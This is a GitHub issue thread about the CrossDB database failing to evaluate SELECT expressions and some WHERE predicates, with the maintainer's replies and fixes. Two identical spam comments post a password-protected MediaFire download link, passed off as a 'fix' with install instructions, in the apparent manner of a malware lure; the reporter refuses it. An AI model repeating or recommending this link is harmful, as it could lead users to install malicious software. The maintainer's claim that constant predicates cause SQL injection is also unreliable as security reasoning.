### ISSUE TITLE
Selecting expressions does not work

### ISSUE THREAD

**Issue by mripley** [crossdb-org/crossdb#12]
There appears to be no ability to project expressions in queries. Example
```
XDB> create table t1 (c1 int); 
Query OK, 0 row affected (2.217 ms)

XDB> insert into t1 values (0),(1); 
Query OK, 2 rows affected (0.254 ms)

XDB> select c1 + 10 from t1; 
ERROR 3: Except FROM

```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mripley** [comment]
Yea ... I'm not downloading some random media fire link. If you have a fix please push a branch here and i'll consider reviewing it.

**Comment by jcwangxp** [comment]
Will support in next release, but only simple expression. Complex expression will be supported later.

**Comment by mripley** [comment]
You may want to update your documentation to reflect these limitations otherwise folks may find themselves disappointed once they start to use it.

**Comment by jcwangxp** [comment]
It's noted here. I've delivered this feature just now.

https://crossdb.org/sql/operators/

**Comment by mripley** [comment]
There seems to be a bug in predicate evaluation. Example:

```
XDB> select * from t2 where c2 < 3; 
+----+
| c2 |
+----+
| 0  |
| 1  |
| 2  |
+----+
3 rows in set (0.025 ms)

XDB> select * from t2 where 3 < c1; 
+----+
| c2 |
+----+
| 0  |
| 1  |
| 2  |
| 3  |
| 4  |
+----+
5 rows in set (0.033 ms)
```

**Comment by jcwangxp** [comment]
'3 < c1' can be changed to 'c1 > 3', and I'll support later.

**Comment by mripley** [comment]
Sure. I also noted any constant false predicates returned wrong results as
well. E g 'where 1 = 2'

**Comment by jcwangxp** [comment]
For constant predicates like '1 = 1', this may cause SQL injection attacks. I plan not to support this feature. What's your opinion? Are there any real use cases that need this feature?

**Comment by jcwangxp** [comment]
Support in 0.8.0
